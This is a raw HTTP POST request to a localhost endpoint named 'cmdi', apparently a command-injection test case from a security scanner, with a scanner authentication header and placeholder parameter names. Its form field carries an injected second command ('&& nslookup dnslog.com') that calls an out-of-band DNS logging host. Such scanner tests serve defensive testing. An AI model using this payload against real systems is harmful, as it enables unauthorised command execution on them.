POST /cmdi/BS00115 HTTP/1.1
Host: localhost
Connection: close
Accept-Encoding: gzip, deflate
Accept: text/html,application/json,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
BS00113: BS00113
Cookie: BS00113=BS00113;
Referer: http://localhost/
Origin:http://localhost/
scannerauth:cd117e0a9365670f19c768032f8dabfe
Content-Type: application/x-www-form-urlencoded
Content-Length: 52

BS00115=123 %26%26 nslookup dnslog.com